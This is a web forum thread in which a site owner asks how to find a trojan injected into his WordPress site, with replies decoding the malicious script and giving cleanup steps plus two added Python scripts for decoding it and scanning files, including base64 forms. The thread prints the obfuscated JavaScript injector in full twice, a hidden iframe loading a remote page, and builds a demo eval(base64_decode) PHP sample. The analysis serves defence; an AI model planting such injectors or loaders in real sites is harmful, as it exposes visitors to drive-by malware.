Hidden Trojan on my website - How to find it?

@Steve110

Posted in: #Virus

I have a big problem. Kaspersky says my website is infected with a trojan. So I downloaded my whole website and ran a scan, and it was clean. I also ran ClamAV on it and it was clean too.

So next I asked a few guys to test it, and when they go to my website the warning appears, not only in Kaspersky but in Norton too.

I think it's a hidden trojan, like when you refresh the page you see the warning, while it's hidden in the files.

Kaspersky gave me the following code:

<script type='text/javascript'>/*<![CDATA[*/var wow="b3nimb2eawiki11b1infob1ms";c1="l"+"on"+"l"+"y ";if(-1==document.cookie.indexOf(c1)){var a=new Date;a.setTime(a.getTime());c3=72E6;c2=new Date(a.getTime()+c3);document.cookie=c1+"="+escape(c2.toGMTString())+";e"+"xpir"+"es="+c2.toGMTString()+";p"+"at"+"h=/";var a=document.createElement("if"+"r"+"am"+"e");a.setAttribute("sr"+"c","h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g, "e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l");a.style.position="ab"+"sol"+"ute";a.style.width="1"+"8p"+"x";a.setAttribute("f"+"ra"+"mebo"+"rd"+"er",navigator.userAgent.indexOf("1"+"23"+"4231"+"532"+"4")+1);a.style.left="-"+"57"+"50"+"p"+"x";document.write("<"+"di"+"v i"+"d='d"+"efus"+"e'>"+"</di"+"v>");document.getElementById("de"+"f"+"us"+"e").appendChild(a)};/*]]>*/</script>


So now I am lost. What can I do?


4 Comments


@Merenda212

This depends mostly on the CMS (if any). I would go to the website root and run something like:


grep -lr b3nimb2eawiki11b1infob1ms *


as b3nimb2eawiki11b1infob1ms seems to be the signature of this malware.

As a second step, I would look in the database for that string too (phpMyAdmin has a feature for this, for example), looking in all tables/fields.

Once found, delete the malicious code; there is probably more than one file/record, so the work needed to clean this could vary accordingly. Once you find where you were hacked, try to find out why, and secure your server code!


@Chiappetta492

The reported URL f1arab.com does not contain this piece of JS code at first sight.



So, looking at the script, we can figure out where it is trying to send you:

var wow = "b3nimb2eawiki11b1infob1ms";
var url = "h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g, "e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l";
document.write(url);


which yields:
anime-wiki11.info.ms:81/rem2.html

Querying this URL twice, we see on the first attempt that it can't find a page on Yahoo, and on the second that it can't load it at all. If you search for the b3nimb2eawiki11b1infob1ms string on Google, you see that these exploit attempts are quite dated, and it appears that Yahoo already took them offline.

Searching for the URL you obtain, you see my attempts to query it as well as two sites also infected with this script. But as this shows, the script is no longer harmful, so it is safe to visit both URLs, assuming Yahoo doesn't put it back.



When doing yet another check with urlQuery on the reported URL, we see this request happening:

GET /rem2.html HTTP/1.1
Host: mrzwheremeread.info.br.ms:81


But once again this URL leads to something Yahoo already took offline.

The interesting thing is that this is different from the URL shown in your question, so it is being generated dynamically. That's why a quick search earlier on did not find the JS code.

This is evidenced by the following HTML code being injected at a certain point:

<script type="text/javascript">/*<![CDATA[*/var wow="mrzwhb2rb2mb2rb2b3db1infob1brb1ms";c1="l"+"on"+"l"+"y";if(-1==document.cookie.indexOf(c1)){var a=new Date;a.setTime(a.getTime());c3=72E6;c2=new Date(a.getTime()+c3);document.cookie=c1+"="+escape(c2.toGMTString())+";e"+"xpir"+"es="+c2.toGMTString()+";p"+"at"+"h=/";var a=document.createElement("if"+"r"+"am"+"e");a.setAttribute("sr"+"c","h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g,"e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l");a.style.position="ab"+"sol"+"ute";a.style.width="1"+"8p"+"x";a.setAttribute("f"+"ra"+"mebo"+"rd"+"er",navigator.userAgent.indexOf("1"+"23"+"4231"+"532"+"4")+1);a.style.left="-"+"57"+"50"+"p"+"x";document.write("<"+"di"+"v i"+"d='d"+"efus"+"e'>"+"</di"+"v>");document.getElementById("de"+"f"+"us"+"e").appendChild(a)};/*]]>*/</script>


As we can see on urlQuery that this code isn't being injected through JavaScript, this must be happening server-side. What we also see here through wp-content is that you are using WordPress, so most likely they are using a WordPress exploit to insert that code.

Start by updating WordPress and the plugins, as well as disabling things that you don't need. From there on, you can look into making file permissions a bit more restrictive on the server, as well as PHP settings to disallow writing from/to places you don't want.

Also, searching for var wow or just wow over all hosted files on the server would be a nice approach, as that seems not to be dynamic; please note that it might appear in an encrypted form, which might require you to search manually...

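
Added example, not from the thread: a small Python decoder for the injector quoted above. The script hides its strings as "a"+"b" concatenations and encodes the iframe host with a chain of replace() calls, so the decoder first joins the split literals, then replays the replace chain in the same order the script runs it (order matters: the "ea" to "-" step runs before "b3" to "a"). It also reads out the cookie gate: the script only writes the iframe when the c1 cookie is missing, then sets it for c3 milliseconds. The sample is the script from the question with whitespace normalised and one statement per line; the function names are mine.

```python
import re

# "ab"+"cd" with no escapes inside either literal (true for this sample).
CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')
# "prefix"+wow.replace(/x/g,"y").replace(...)+"suffix", after collapsing.
URL_EXPR = re.compile(r'"([^"]*)"\s*\+\s*wow((?:\.replace\([^)]*\))+)\s*\+\s*"([^"]*)"')
# One .replace(/pattern/g,"replacement") link of the chain.
LINK = re.compile(r'\.replace\(/(.+?)/g,\s*"([^"]*)"\)')


def collapse_concat(js: str) -> str:
    """Join split string literals until no "x"+"y" pair remains."""
    prev = None
    while prev != js:
        prev = js
        js = CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), js)
    return js


def replay_chain(value: str, chain: str) -> str:
    """Apply each .replace(/p/g,"r") in `chain` to value, left to right,
    exactly as the browser would (global regex replace)."""
    for pattern, repl in LINK.findall(chain):
        value = re.sub(pattern, lambda _m, r=repl: r, value)
    return value


def decode_injector(js: str) -> dict:
    """Return the iframe target and the cookie gate of one injector script."""
    flat = collapse_concat(js)
    wow = re.search(r'var\s+wow\s*=\s*"([^"]*)"', flat)
    url = URL_EXPR.search(flat)
    if not (wow and url):
        raise ValueError("script does not match the var wow / replace-chain pattern")
    prefix, chain, suffix = url.groups()
    cookie = re.search(r'c1\s*=\s*"([^"]*)"', flat)
    ttl_ms = re.search(r'c3\s*=\s*([0-9.]+(?:[eE][+-]?[0-9]+)?)', flat)
    return {
        "iframe_src": prefix + replay_chain(wow.group(1), chain) + suffix,
        # the script injects only when this cookie is absent, then sets it
        "cookie_name": cookie.group(1) if cookie else None,
        "cookie_hours": float(ttl_ms.group(1)) / 3_600_000 if ttl_ms else None,
    }


# Replace chain copied from the thread's script, for decoding a bare wow value.
DEFAULT_CHAIN = '.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g,"e").replace(/b1/g,".")'


def decode_wow(wow: str, chain: str = DEFAULT_CHAIN) -> str:
    """Decode a wow value the way the script does (e.g. from a new variant)."""
    return replay_chain(wow, chain)


# The injector from the question, whitespace normalised, one statement per line.
SAMPLE = """<script type='text/javascript'>/*<![CDATA[*/var wow="b3nimb2eawiki11b1infob1ms";
c1="l"+"on"+"l"+"y";if(-1==document.cookie.indexOf(c1)){var a=new Date;a.setTime(a.getTime());
c3=72E6;c2=new Date(a.getTime()+c3);
document.cookie=c1+"="+escape(c2.toGMTString())+";e"+"xpir"+"es="+c2.toGMTString()+";p"+"at"+"h=/";
var a=document.createElement("if"+"r"+"am"+"e");
a.setAttribute("sr"+"c","h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g, "e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l");
a.style.position="ab"+"sol"+"ute";a.style.width="1"+"8p"+"x";
a.setAttribute("f"+"ra"+"mebo"+"rd"+"er",navigator.userAgent.indexOf("1"+"23"+"4231"+"532"+"4")+1);
a.style.left="-"+"57"+"50"+"p"+"x";
document.write("<"+"di"+"v i"+"d='d"+"efus"+"e'>"+"</di"+"v>");
document.getElementById("de"+"f"+"us"+"e").appendChild(a)};/*]]>*/</script>"""

if __name__ == "__main__":
    print(decode_injector(SAMPLE))
    print(decode_wow("mrzwhb2rb2mb2rb2b3db1infob1brb1ms"))
```

Because the replace table is parsed from the script itself rather than hard-coded, the same decoder works on the second variant urlQuery captured (a different wow value, same chain), and on any later variant that only changes the table.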

@LarsenBagley505

You can also scan your site at sitecheck.sucuri.net/scanner/
Common forms of malware inject PHP code into your index.php files, which generates the JavaScript. The PHP doesn't look like the JavaScript; it may be base64-encoded, or it may not.

It's also possible you have rogue PHP files on your site inserting the code into your index files. In that case you need to find those files. Good hosting companies can scan your account quickly to find backdoor shells.

If you run WordPress it may also be coming from entries in your database.

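
Added example, not from the thread, that covers both the grep @Merenda212 suggested and the base64-encoded PHP mentioned in the previous comment. A plain grep for the marker misses a file where the generating PHP sits inside a base64 blob handed to eval(); the scanner below therefore searches for the marker as text and in all three base64 alignments (a marker can start at any byte offset relative to base64's 3-byte groups, and only the characters that depend solely on the marker's own bytes are kept). The web root it scans and the three files in it are constructed for the demo; the path names are placeholders, not known malware locations.

```python
import base64
import os
import tempfile

# Markers from the thread: the encoded host, and the variable the script always uses.
MARKERS = ("b3nimb2eawiki11b1infob1ms", "var wow=")


def base64_variants(marker: bytes) -> list:
    """Substrings found in the base64 of ANY data containing `marker`, one per
    3-byte alignment. Characters whose value also depends on the unknown
    bytes before or after the marker are trimmed off."""
    variants = []
    for lead in range(3):
        padded = b"\0" * lead + marker
        tail = (-len(padded)) % 3
        enc = base64.b64encode(padded + b"\0" * tail).decode()
        # group [?, m0, m1] exposes marker bytes only from its 3rd char,
        # [?, ?, m0] only from its 4th; the trailing group mirrors this.
        head = {0: 0, 1: 2, 2: 3}[lead]
        drop = {0: 0, 1: 2, 2: 3}[tail]
        variants.append(enc[head:len(enc) - drop])
    return variants


def find_markers(root: str, markers=MARKERS) -> list:
    """Sorted (path, form, marker) for every file under root that contains a
    marker either as plain text or inside base64-encoded data."""
    needles = []
    for m in markers:
        forms = [("plain", m.encode())]
        forms += [("base64", v.encode()) for v in base64_variants(m.encode())]
        needles.append((m, forms))
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip, keep scanning
            for marker, forms in needles:
                for form, needle in forms:
                    if needle in data:
                        hits.append((path, form, marker))
                        break  # one report per (file, marker)
    return sorted(hits)


def _write(root: str, rel: str, data: bytes) -> None:
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo() -> list:
    """Build a constructed web root in a temp dir, scan it, and return the hits
    with paths relative to the root."""
    root = tempfile.mkdtemp(prefix="webroot-")
    marker = MARKERS[0].encode()
    injected = b"echo '<script>var wow=\"" + marker + b"\";</script>';"
    _write(root, "index.html", b"<html><body>clean page</body></html>")
    # plain injection in a PHP file: the form grep -r finds
    _write(root, "blog/index.php", b"<?php " + injected + b" ?>")
    # same PHP hidden in a base64 blob handed to eval(): grep for the marker
    # text finds nothing here, the base64 variants do
    blob = base64.b64encode(injected)
    _write(root, "wp-content/uploads/cache.php",
           b"<?php eval(base64_decode('" + blob + b"')); ?>")
    return [(os.path.relpath(p, root).replace(os.sep, "/"), form, m)
            for p, form, m in find_markers(root)]


if __name__ == "__main__":
    for hit in demo():
        print(*hit)
```

Point it at the real web root with find_markers("/path/to/webroot"). The same plain and base64 needles can be pasted into the database search @Merenda212 mentions, since injected rows are hidden the same way; a hit only tells you where the payload is stored, not how it got there, so the "find out why" step still follows.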

@Kristi941

You obviously need to do two things:


1. Find all instances of that code on your site and remove it.
2. Find out how you got hacked in the first place and fix it. If you're using a CMS, upgrade to the latest version immediately. If you still get hacked, then a backdoor has been installed on your site and you'll need to completely remove all of your site's files and reinstall your CMS from scratch (after backing up your database).
